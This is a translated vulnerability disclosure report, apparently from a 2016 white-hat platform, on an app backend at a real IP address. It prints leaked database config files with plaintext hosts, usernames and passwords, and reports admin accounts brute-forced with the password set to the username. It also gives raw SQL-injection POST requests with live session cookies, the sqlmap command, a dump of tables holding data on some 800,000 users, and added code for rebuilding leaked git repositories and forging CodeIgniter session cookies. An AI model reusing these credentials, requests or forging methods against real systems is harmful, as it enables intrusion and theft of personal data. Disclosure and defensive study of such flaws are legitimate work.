Disclosure timeline:
2016-05-12: Details sent to the vendor, awaiting vendor processing
2016-05-12: Vendor confirmed; details visible to the vendor only
2016-05-22: Details opened to core white hats and relevant domain experts
2016-06-01: Details opened to regular white hats
2016-06-11: Details opened to intern white hats
2016-06-26: Details opened to the public
As the title says.
First, a git source leak: http://121.40.223.69:8028/.git/config. I used Li Jiejie's git script to download the source.
Then I went to config to look for the configuration files.
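The download step above relies on a property of any .git directory served over HTTP: a 200 on .git/config shows the directory is exposed, and every committed file then sits in it as a zlib-compressed loose object under objects/xx/yyyy..., reachable from HEAD through refs, commit, trees and blobs. The following Python is an added example, not the report's code and not Li Jiejie's script; it performs the offline half of that reconstruction (HEAD -> ref -> commit -> tree -> blob) on a constructed in-memory repository, which is what a downloader does after fetching each path and what a defender can use to see exactly which files a leaked tree exposed. Packfiles under objects/pack are deliberately not handled.

```python
"""Reconstruct files from a leaked .git directory, offline.

Added example, not the report's or GitHack's code. The repository below is
constructed in memory; `files` maps a path relative to .git/ to its raw bytes,
exactly what an HTTP downloader would have written to disk.
"""
import hashlib
import zlib


def store_object(files, kind, payload):
    """Write a loose object the way git does: zlib('<kind> <size>\\0' + payload)."""
    raw = b"%s %d\x00" % (kind.encode(), len(payload)) + payload
    sha = hashlib.sha1(raw).hexdigest()
    files["objects/%s/%s" % (sha[:2], sha[2:])] = zlib.compress(raw)
    return sha


def read_object(files, sha):
    """Inflate a loose object and return (kind, body), checking the size header."""
    raw = zlib.decompress(files["objects/%s/%s" % (sha[:2], sha[2:])])
    header, _, body = raw.partition(b"\x00")
    kind, size = header.split(b" ")
    if int(size) != len(body):
        raise ValueError("corrupt object %s" % sha)
    return kind.decode(), body


def parse_tree(body):
    """Yield (mode, name, sha_hex) from tree entries of the form '<mode> <name>\\0<20-byte sha>'."""
    i = 0
    while i < len(body):
        sp = body.index(b" ", i)
        nul = body.index(b"\x00", sp)
        yield body[i:sp].decode(), body[sp + 1:nul].decode(), body[nul + 1:nul + 21].hex()
        i = nul + 21


def resolve_head(files):
    """HEAD is either symbolic ('ref: refs/heads/x') or a bare commit hash."""
    head = files["HEAD"].decode().strip()
    return files[head[5:]].decode().strip() if head.startswith("ref: ") else head


def checkout(files, tree_sha, prefix=""):
    """Recursively materialise a tree as {path: bytes}."""
    out = {}
    for mode, name, sha in parse_tree(read_object(files, tree_sha)[1]):
        if mode == "40000":                      # subdirectory entry
            out.update(checkout(files, sha, prefix + name + "/"))
        else:
            kind, body = read_object(files, sha)
            if kind != "blob":
                raise ValueError("expected blob at %s%s, got %s" % (prefix, name, kind))
            out[prefix + name] = body
    return out


def dump_repo(files):
    """Return the working tree of the commit HEAD points to."""
    kind, body = read_object(files, resolve_head(files))
    if kind != "commit":
        raise ValueError("HEAD does not point at a commit")
    tree_sha = body.split(b"\n", 1)[0].split(b" ")[1].decode()   # first line is 'tree <sha>'
    return checkout(files, tree_sha)


def build_sample_repo():
    """Constructed stand-in for a fetched .git directory (path -> raw bytes)."""
    files = {}
    cfg_sha = store_object(files, "blob", b"<?php\n$db['default']['password'] = 'example-only';\n")
    idx_sha = store_object(files, "blob", b"<?php\necho 'index';\n")
    cfg_tree = store_object(files, "tree", b"100644 database.php\x00" + bytes.fromhex(cfg_sha))
    root_tree = store_object(files, "tree",
                             b"40000 config\x00" + bytes.fromhex(cfg_tree)
                             + b"100644 index.php\x00" + bytes.fromhex(idx_sha))
    commit = "tree %s\nauthor a <a@x> 0 +0000\ncommitter a <a@x> 0 +0000\n\nsample\n" % root_tree
    commit_sha = store_object(files, "commit", commit.encode())
    files["HEAD"] = b"ref: refs/heads/master\n"
    files["refs/heads/master"] = (commit_sha + "\n").encode()
    return files


if __name__ == "__main__":
    for path, data in sorted(dump_repo(build_sample_repo()).items()):
        print(path, "->", data.decode().strip().splitlines()[-1])
```

The same walk is the cheapest way to audit a leak after the fact: run it over the recovered directory and grep the resulting paths and blobs for config files and credentials, rather than guessing which files an attacker could have reached.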
database.php:

<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| ['hostname'] The hostname of your database server.
| ['username'] The username used to connect to the database
| ['password'] The password used to connect to the database
| ['database'] The name of the database you want to connect to
| ['dbdriver'] The database type. ie: mysql. Currently supported:
|              mysql, mysqli, postgre, odbc, mssql, sqlite, oci8
| ['dbprefix'] You can add an optional prefix, which will be added
|              to the table name when using the Active Record class
| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection
| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
| ['cache_on'] TRUE/FALSE - Enables/disables query caching
| ['cachedir'] The path to the folder where cache files should be stored
| ['char_set'] The character set used in communicating with the database
| ['dbcollat'] The character collation used in communicating with the database
|              NOTE: For MySQL and MySQLi databases, this setting is only used
|              as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
|              (and in table creation queries made with DB Forge).
|              There is an incompatibility in PHP with mysql_real_escape_string() which
|              can make your site vulnerable to SQL injection if you are using a
|              multi-byte character set and are running versions lower than these.
|              Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
| ['swap_pre'] A default table prefix that should be swapped with the dbprefix
| ['autoinit'] Whether or not to automatically initialize the database.
| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
|              - good for ensuring strict SQL while developing
|
| The $active_group variable lets you choose which connection group to
| make active. By default there is only one group (the 'default' group).
|
| The $active_record variables lets you determine whether or not to load
| the active record class
*/

$active_group = 'default';
$active_record = TRUE;

$db['default']['hostname'] = '120.55.130.50';
$db['default']['username'] = 'ypp_test';
$db['default']['password'] = 'vbnm1234_2015n1';
$db['default']['database'] = 'ypp_app';
$db['default']['dbdriver'] = 'mysql';
$db['default']['dbprefix'] = '';
$db['default']['pconnect'] = TRUE;
$db['default']['db_debug'] = TRUE;
$db['default']['cache_on'] = FALSE;
$db['default']['cachedir'] = '';
$db['default']['char_set'] = 'utf8';
$db['default']['dbcollat'] = 'utf8_general_ci';
$db['default']['swap_pre'] = '';
$db['default']['autoinit'] = TRUE;
$db['default']['stricton'] = FALSE;

$db['read']['hostname'] = '120.55.130.50';
$db['read']['username'] = 'ypp_test';
$db['read']['password'] = 'vbnm1234_2015n1';
$db['read']['database'] = 'ypp_app';
$db['read']['dbdriver'] = 'mysql';
$db['read']['dbprefix'] = '';
$db['read']['pconnect'] = TRUE;
$db['read']['db_debug'] = TRUE;
$db['read']['cache_on'] = FALSE;
$db['read']['cachedir'] = '';
$db['read']['char_set'] = 'utf8';
$db['read']['dbcollat'] = 'utf8_general_ci';
$db['read']['swap_pre'] = '';
$db['read']['autoinit'] = TRUE;
$db['read']['stricton'] = FALSE;

/* End of file database.php */
/* Location: ./application/config/database.php */

databasebak.php:

<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| ['hostname'] The hostname of your database server.
| ['username'] The username used to connect to the database
| ['password'] The password used to connect to the database
| ['database'] The name of the database you want to connect to
| ['dbdriver'] The database type. ie: mysql. Currently supported:
|              mysql, mysqli, postgre, odbc, mssql, sqlite, oci8
| ['dbprefix'] You can add an optional prefix, which will be added
|              to the table name when using the Active Record class
| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection
| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
| ['cache_on'] TRUE/FALSE - Enables/disables query caching
| ['cachedir'] The path to the folder where cache files should be stored
| ['char_set'] The character set used in communicating with the database
| ['dbcollat'] The character collation used in communicating with the database
|              NOTE: For MySQL and MySQLi databases, this setting is only used
|              as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
|              (and in table creation queries made with DB Forge).
|              There is an incompatibility in PHP with mysql_real_escape_string() which
|              can make your site vulnerable to SQL injection if you are using a
|              multi-byte character set and are running versions lower than these.
|              Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
| ['swap_pre'] A default table prefix that should be swapped with the dbprefix
| ['autoinit'] Whether or not to automatically initialize the database.
| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
|              - good for ensuring strict SQL while developing
|
| The $active_group variable lets you choose which connection group to
| make active. By default there is only one group (the 'default' group).
|
| The $active_record variables lets you determine whether or not to load
| the active record class
*/

$active_group = 'default';
$active_record = TRUE;

$db['default']['hostname'] = 'rds545rqplqgyjlcxbsrupublic.mysql.rds.aliyuncs.com';
$db['default']['username'] = 'ypp_test';
$db['default']['password'] = 'vbnm1234_2015n1';
$db['default']['database'] = 'ypp_app';
$db['default']['dbdriver'] = 'mysqli';
$db['default']['dbprefix'] = '';
$db['default']['pconnect'] = TRUE;
$db['default']['db_debug'] = TRUE;
$db['default']['cache_on'] = FALSE;
$db['default']['cachedir'] = '';
$db['default']['char_set'] = 'utf8';
$db['default']['dbcollat'] = 'utf8_general_ci';
$db['default']['swap_pre'] = '';
$db['default']['autoinit'] = TRUE;
$db['default']['stricton'] = FALSE;

$db['read']['hostname'] = 'rds545rqplqgyjlcxbsrupublic.mysql.rds.aliyuncs.com';
$db['read']['username'] = 'ypp_test';
$db['read']['password'] = 'vbnm1234_2015n1';
$db['read']['database'] = 'ypp_app';
$db['read']['dbdriver'] = 'mysqli';
$db['read']['dbprefix'] = '';
$db['read']['pconnect'] = TRUE;
$db['read']['db_debug'] = TRUE;
$db['read']['cache_on'] = FALSE;
$db['read']['cachedir'] = '';
$db['read']['char_set'] = 'utf8';
$db['read']['dbcollat'] = 'utf8_general_ci';
$db['read']['swap_pre'] = '';
$db['read']['autoinit'] = TRUE;
$db['read']['stricton'] = FALSE;

/* activity-activation database, read/write */
$db['huodong_default']['hostname'] = 'rds659r99gpc0lsarrd4o.mysql.rds.aliyuncs.com';
$db['huodong_default']['username'] = 'crop_sys_admin';
$db['huodong_default']['password'] = 'yppcroprds2016';
$db['huodong_default']['database'] = 'ypp_cms_db';
$db['huodong_default']['dbdriver'] = 'mysqli';
$db['huodong_default']['dbprefix'] = '';
$db['huodong_default']['pconnect'] = TRUE;
$db['huodong_default']['db_debug'] = TRUE;
$db['huodong_default']['cache_on'] = FALSE;
$db['huodong_default']['cachedir'] = '';
$db['huodong_default']['char_set'] = 'utf8';
$db['huodong_default']['dbcollat'] = 'utf8_general_ci';
$db['huodong_default']['swap_pre'] = '';
$db['huodong_default']['autoinit'] = TRUE;
$db['huodong_default']['stricton'] = FALSE;

/* activity-activation database, read */
$db['huodong_read']['hostname'] = 'rds659r99gpc0lsarrd4o.mysql.rds.aliyuncs.com';
$db['huodong_read']['username'] = 'crop_sys_admin';
$db['huodong_read']['password'] = 'yppcroprds2016';
$db['huodong_read']['database'] = 'ypp_cms_db';
$db['huodong_read']['dbdriver'] = 'mysqli';
$db['huodong_read']['dbprefix'] = '';
$db['huodong_read']['pconnect'] = TRUE;
$db['huodong_read']['db_debug'] = TRUE;
$db['huodong_read']['cache_on'] = FALSE;
$db['huodong_read']['cachedir'] = '';
$db['huodong_read']['char_set'] = 'utf8';
$db['huodong_read']['dbcollat'] = 'utf8_general_ci';
$db['huodong_read']['swap_pre'] = '';
$db['huodong_read']['autoinit'] = TRUE;
$db['huodong_read']['stricton'] = FALSE;

/* End of file database.php */
/* Location: ./application/config/database.php */

Both files use the same ypp_test account; the backup copy points at Aliyun RDS endpoints instead of a bare IP and adds a second credential set (crop_sys_admin) for the activity database. Every connection group sets db_debug = TRUE, so database errors are displayed to the client.
Redis unauthenticated access: 121.40.223.69:6379
I tried to get a shell through it, but unfortunately it didn't work.
Then I found the management system at http://121.40.223.69:8028/admin/ and brute-forced five usernames: chenyan, zhanglin, zhangyong, guochao, liyongsheng. Trying password = username, two of them worked: liyongsheng/liyongsheng and guochao/guochao.
Logged into the backend successfully and saw 800,000 user records.
Wow, that's a lot.
I looked for SQL injection in the backend; there is plenty. I picked two POST injections.

sqlmap syntax: sqlmap.py -r 1.txt --dbs

Injection 1, parameter wangbano (POST request saved as 1.txt):

POST /admin/pubwin_stores_list HTTP/1.1
Host: 121.40.223.69:8028
Proxy-Connection: keep-alive
Content-Length: 98
Accept: */*
Origin: http://121.40.223.69:8028
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://121.40.223.69:8028/admin/index
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d2861bb11873a6c90460ef26416b6f89%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22115.214.46.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1462990496%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22session_admin%22%3BO%3A8%3A%22stdClass%22%3A12%3A%7Bs%3A2%3A%22id%22%3Bs%3A32%3A%228866911c1bcf252661f371d551223e21%22%3Bs%3A8%3A%22username%22%3Bs%3A7%3A%22guochao%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A%22290627921faed27657267299574975b8%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22role%22%3Bs%3A32%3A%22561168d496841527359a0c57b7586a3e%22%3Bs%3A8%3A%22store_id%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22create_time%22%3Bs%3A19%3A%222016-03-01+15%3A44%3A02%22%3Bs%3A4%3A%22city%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22token%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E9%83%AD%E8%B6%85%22%3Bs%3A14%3A%22remember_token%22%3BN%3Bs%3A10%3A%22updated_at%22%3BN%3B%7D%7D4bcb57eee7a61ab4f899d97f5db07424

pageNum=1&numPerPage=20&wangbano=1&store_name=1&server_version=1&can_recharge=&can_select_balance=

Injection 2, parameter mobile:

POST /admin/god_list HTTP/1.1
Host: 121.40.223.69:8028
Proxy-Connection: keep-alive
Content-Length: 206
Accept: */*
Origin: http://121.40.223.69:8028
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://121.40.223.69:8028/admin/index
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221eae6a510bc7164581ec422a36287375%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22115.214.46.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1462991222%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22session_admin%22%3BO%3A8%3A%22stdClass%22%3A12%3A%7Bs%3A2%3A%22id%22%3Bs%3A32%3A%228866911c1bcf252661f371d551223e21%22%3Bs%3A8%3A%22username%22%3Bs%3A7%3A%22guochao%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A%22290627921faed27657267299574975b8%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22role%22%3Bs%3A32%3A%22561168d496841527359a0c57b7586a3e%22%3Bs%3A8%3A%22store_id%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22create_time%22%3Bs%3A19%3A%222016-03-01+15%3A44%3A02%22%3Bs%3A4%3A%22city%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22token%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E9%83%AD%E8%B6%85%22%3Bs%3A14%3A%22remember_token%22%3BN%3Bs%3A10%3A%22updated_at%22%3BN%3B%7D%7D681991a95831bb63fbe22bb5f789610c

pageNum=1&numPerPage=20&mobile=1&source=&isbind=&is_official=&price_begin=1&price_end=&god_company_id=&keyword=1&true_name=&gender=&status=&createtime_begin=2016-05-11&createtime_end=2016-05-19&city_name=11
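The ci_session cookie in both requests is worth a second look. Its shape, a URL-encoded PHP serialize() array followed by exactly 32 hex characters, is how CodeIgniter 2.x stores a session when sess_encrypt_cookie is FALSE: serialize($data) . md5(serialize($data) . $encryption_key). The entire session_admin record (username, role, password hash, real name) therefore travels in the client's cookie, and its only integrity check is an MD5 keyed by encryption_key from application/config/config.php; if that file is in the leaked tree (the report does not show it), anyone holding the source can mint an admin session without brute-forcing a password. The Python below is an added example, not the report's or the application's code: it decodes such a cookie, verifies the trailing MD5 against a key, and builds one, using a constructed key and a constructed session shaped like the captured one.

```python
"""Decode a CodeIgniter 2.x ci_session cookie and check its trailing MD5.

Added example, not from the report. CI 2.x with sess_encrypt_cookie = FALSE
stores serialize($data) . md5(serialize($data) . $encryption_key) in the
cookie; the key and session values used here are constructed placeholders.
"""
import hashlib
from urllib.parse import quote_plus, unquote_to_bytes


class PhpObject(dict):
    """A PHP object (O:len:"Class":n:{...}) as a dict that keeps its class name."""
    cls = "stdClass"


def php_unserialize(data, pos=0):
    """Parse the serialize() subset CI sessions use; returns (value, next_pos)."""
    t = data[pos:pos + 1]
    if t == b"N":                                   # N;
        return None, pos + 2
    if t in (b"i", b"b"):                           # i:123;  b:1;
        end = data.index(b";", pos)
        val = int(data[pos + 2:end])
        return (bool(val) if t == b"b" else val), end + 1
    if t == b"s":                                   # s:<bytes>:"...";  length counts bytes
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start, end = colon + 2, colon + 2 + length
        if data[end:end + 2] != b'";':
            raise ValueError("bad string at %d" % pos)
        return data[start:end].decode("utf-8"), end + 2
    if t in (b"a", b"O"):                           # a:n:{...}  O:len:"Class":n:{...}
        colon = data.index(b":", pos + 2)
        if t == b"a":
            out, count, pos = {}, int(data[pos + 2:colon]), colon + 2
        else:
            name_len = int(data[pos + 2:colon])
            out = PhpObject()
            out.cls = data[colon + 2:colon + 2 + name_len].decode()
            pos = colon + 2 + name_len + 2          # past :"Class":
            colon = data.index(b":", pos)
            count, pos = int(data[pos:colon]), colon + 2
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            out[key], pos = php_unserialize(data, pos)
        if data[pos:pos + 1] != b"}":
            raise ValueError("bad container end at %d" % pos)
        return out, pos + 1
    raise ValueError("unsupported type %r at %d" % (t, pos))


def php_serialize(value):
    """Inverse of php_unserialize for the same subset (needed to build a cookie)."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):
        return b"b:%d;" % value
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return b's:%d:"%s";' % (len(raw), raw)
    body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
    if isinstance(value, PhpObject):
        name = value.cls.encode()
        return b'O:%d:"%s":%d:{%s}' % (len(name), name, len(value), body)
    return b"a:%d:{%s}" % (len(value), body)


def parse_ci_session(cookie_value, encryption_key):
    """Return (session, signature_ok) for a URL-encoded ci_session value."""
    raw = unquote_to_bytes(cookie_value.replace("+", " "))
    data, sig = raw[:-32], raw[-32:]
    session, end = php_unserialize(data)
    if end != len(data):
        raise ValueError("trailing bytes after serialized session")
    expected = hashlib.md5(data + encryption_key.encode()).hexdigest().encode()
    return session, sig == expected


def make_ci_session(session, encryption_key):
    """Build a cookie CI accepts; with a leaked key this is a forged session."""
    data = php_serialize(session)
    return quote_plus(data + hashlib.md5(data + encryption_key.encode()).hexdigest().encode())


def sample_session():
    """Constructed session shaped like the one in the captured requests."""
    admin = PhpObject(id="0" * 32, username="guochao", status="1", realname="郭超")
    return {"session_id": "f" * 32, "ip_address": "203.0.113.7",
            "user_agent": "Mozilla/5.0 (constructed)", "last_activity": 1462990496,
            "user_data": "", "session_admin": admin}
```

Run parse_ci_session on the real cookie from the capture with any key to read the admin record; the signature check only passes with the application's actual encryption_key. Two CI details to keep in mind: sess_match_ip and sess_match_useragent, when enabled, additionally compare ip_address and user_agent in the cookie against the request, so a forged cookie must carry matching values, and last_activity must be within sess_expiration. The fix on the application side is to keep session data server-side (CI's sess_use_database) or at least set sess_encrypt_cookie = TRUE and rotate encryption_key after a source leak.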
Database information:

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] ypp_app_test

Table information:

Database: ypp_app_test
| Table | Entries |
|---|---|
| t_user_login | 4918627 |
| t_dongtai_reply | 3559021 |
| t_score_journal | 2950727 |
| t_recharge | 1722530 |
| t_notify | 1433701 |
| t_sms_log | 1269551 |
| t_god_score_log | 1092585 |
| t_platform_game_winner | 1040977 |
| t_user_ext | 802812 |
| t_user | 801473 |
| t_sys_invite_code | 772075 |
| t_wy_register | 641601 |
| t_coupon_detail | 638662 |
| t_user_journal | 488742 |
| t_sms_submail_log | 478570 |
| t_user_month_login | 470310 |
| t_dongtai | 428084 |
| t_dongtai_dashang | 405641 |
| t_god_lovelog | 398673 |
| t_fin_alipayjournal_old | 393343 |
| t_user_cash_journal | 389924 |
| t_recharge_pomotion_users | 327359 |
| t_play_order | 257786 |
| t_platform_game_winner_backup | 256938 |
| t_admin_log | 250742 |
| t_user_photo | 234687 |
| t_staff_drink | 229784 |
| t_signin | 220205 |
| t_chat_log | 186966 |
| t_mobile_area | 149310 |
| t_god_apply_photo | 129561 |
| t_play_response | 126662 |
| t_user_game | 111407 |
| t_god_journal | 109822 |
| t_user_oftenstore | 94596 |
| t_play_order_rate | 84686 |
| t_fin_alipayjournal | 70690 |
| t_store_recharge_day_report | 67199 |
| t_group_member | 63781 |
| t_god_cert | 62472 |
| t_god_apply | 54037 |
| t_fin_weixinjournal | 48846 |
| t_biz_log | 48316 |
| t_user_invite | 28339 |
| t_god_items | 25889 |
| t_store_machine | 25241 |
| t_play_order_god_rate | 24506 |
| t_user_count | 24095 |
| t_god_item_apply | 22043 |
| t_godgame_photo | 19752 |
| t_cash_give | 15052 |
| t_reserve | 14859 |
| t_god_jiesuan | 14262 |
| t_cash_get | 14107 |
| t_god_edit_apply | 13451 |
| t_bind_journal | 12344 |
| t_coupon_codes | 9311 |
| t_god | 9259 |
| t_god_order_day_log | 8445 |
| t_user_auth | 8151 |
| t_jubao | 7922 |
| t_play_order_day_report | 7280 |
| t_withdraw | 6647 |
| t_god_game | 6590 |
| t_dongtai_dashang_day_report | 6038 |
| t_god_search | 5982 |
| t_bind_journal_day_report | 5577 |
| t_group | 5017 |
| t_user_alias | 4613 |
| t_group_invitelog | 4476 |
| t_user_poi | 4013 |
| tmp_god_ids | 3909 |
| t_game_winner_day_report | 3415 |
| t_bind_journal_jiaoban_report | 3219 |
| t_shenzhi_code | 3000 |
| t_activity_member | 2947 |
| t_chat_check | 2805 |
| t_admin_role_function | 2638 |
| test_code | 2231 |
| t_biz_city_cat_price | 2186 |
| t_dongtai_dashang_jiaoban_report | 2071 |
| t_group_photo | 2035 |
| t_user_vip | 2015 |
| t_store_recharge_jiaoban_report | 1861 |
| t_tg_gudu | 1825 |
| t_game_winner_jiaoban_report | 1741 |
| t_user_journal_jiaoban_report | 1741 |
| t_fin_changelog | 1589 |
| t_suggestion | 1581 |
| t_store_region | 1541 |
| tmp_dongtai | 1182 |
| t_group_poi | 1065 |
| t_store | 753 |
| t_god_100 | 721 |
| t_activity | 677 |
| t_god_recommand | 525 |
| t_game_partition | 524 |
| t_biz_city_cat | 440 |
| t_activity_reply | 434 |
| t_sys_citys | 407 |
| tmp_gods | 381 |
| t_pubwin_stores | 373 |
| t_city | 372 |
| t_admin_function | 371 |
| t_play_order_shensu | 371 |
| t_ypp_money | 304 |
| t_game_duanwei | 296 |
| t_manual_recharge_to_ypp | 245 |
| t_apilist | 241 |
| t_gym | 237 |
| t_store_manager | 227 |
| t_coupon | 180 |
| t_mall_order | 128 |
| t_bizcircle | 122 |
| t_god_city | 95 |
| t_cat_tag | 90 |
| t_dongtai_keyword | 75 |
| t_game_weizhi | 73 |
| t_playorder_recharge_log | 64 |
| t_god_eidt_price_apply | 51 |
| t_admin_staff | 49 |
| t_banner | 39 |
| t_user_vip_hours | 35 |
| t_cat_level | 32 |
| t_pubwin_region | 31 |
| t_download_ypp | 30 |
| t_dictionary | 29 |
| t_coupon_laplus | 27 |
| t_user_black | 25 |
| t_tuiguang_qudao | 23 |
| t_user_subscribe | 22 |
| t_admin_role | 21 |
| t_biz_cat | 19 |
| t_sysmessage | 19 |
| t_biz_cat_price | 18 |
| t_region | 15 |
| t_game | 13 |
| t_biz_cert | 12 |
| t_recharge_promotion_detail | 12 |
| t_bank | 10 |
| t_search_hotwords | 10 |
| t_biz_navigation | 9 |
| t_recharge_promotion | 9 |
| t_wy_shop_region | 9 |
| t_huodong_item | 8 |
| t_user_vip_coupon | 8 |
| t_compaign | 7 |
| t_jubao_reason | 7 |
| t_act_prize_config | 6 |
| t_complain_custome | 6 |
| t_quiz_items | 6 |
| t_version | 6 |
| t_god_company | 5 |
| t_god_guides | 5 |
| t_user_attach | 5 |
| t_user_vip_config | 4 |
| t_chat_warn | 3 |
| t_coupon_user | 3 |
| t_hobby | 3 |
| t_mall_product | 3 |
| t_quiz | 3 |
| t_site | 3 |
| t_ad | 2 |
| t_city_new_cat_img | 2 |
| t_data_version | 2 |
| t_drink | 2 |
| t_home_recommand | 2 |
| t_huodong | 2 |
| t_act_qualifications_config | 1 |
| t_app_setting | 1 |
| t_god_cert_edit_apply | 1 |
| t_groupno | 1 |
| t_platform_game | 1 |
| t_pushmessage | 1 |
Fix suggestion: filter the parameters and strengthen the passwords.

Severity: High
Vulnerability Rank: 20
Confirmed: 2016-05-12 10:26

Vendor response: The vulnerability is severe; an internal database is exposed. A fix has already been organized.

None yet.